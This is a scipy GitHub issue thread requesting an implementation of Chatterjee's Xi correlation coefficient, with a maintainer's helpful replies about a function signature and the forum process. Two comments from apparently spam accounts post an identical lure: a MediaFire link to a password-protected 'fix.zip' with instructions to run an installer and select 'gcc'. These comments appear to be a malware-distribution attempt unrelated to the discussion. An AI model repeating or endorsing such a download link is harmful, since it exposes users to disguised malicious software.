### ISSUE TITLE
ENH: Add support for Xi Correlation in scipy

### ISSUE THREAD

**Issue by matbmeijer** [scipy/scipy#21453]
### Is your feature request related to a problem? Please describe.

When trying to identify non-linear and non-monotonic correlations, Xi correlation is a good alternative to person, spearman and Kendall correlation. More information about the Xi correlation here:

1. https://towardsdatascience.com/a-new-coefficient-of-correlation-64ae4f260310
2. https://arxiv.org/pdf/1909.10140
3. https://readmedium.com/en/https:/towardsdatascience.com/a-new-coefficient-of-correlation-64ae4f260310

@article{chatterjee2021new,
  title={A new coefficient of correlation},
  author={Chatterjee, Sourav},
  journal={Journal of the American Statistical Association},
  volume={116},
  number={536},
  pages={2009--2022},
  year={2021},
  publisher={Taylor \& Francis}
}

### Describe the solution you'd like.

Like Pearsonr() implementation, implemente Xi correlation implementation.

### Describe alternatives you've considered.

Other alternatives are existing Python libraries doing the implementation, but considering the simplicity of the correlation measure, I do not see any reason to group this within the scipy library

### Additional context (e.g. screenshots, GIFs)

https://arxiv.org/abs/1909.10140

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdhaber** [comment]
This looks pretty useful to me. Please propose it on [the Forum](https://discuss.scientific-python.org/c/contributor/scipy/32) - and maybe suggest a signature, like:
```python3
xi_correlation(x, y, *, axis=0, nan_policy='propagate', keepdims=False)
```
Are there one-sided alternative hypotheses? If so, `alternative='two-sided'` would probably appear in the signature.

Would you be willing to submit a PR?

**Comment by mdhaber** [comment]
@matbmeijer just a reminder to post this on [the forum](https://discuss.scientific-python.org/c/contributor/scipy/32) if you'd like to see this happen. You can mention that I'd be willing to write or review, so you'd only need one other person to get the actual work done (although more than one comment in favor of the idea would be good).
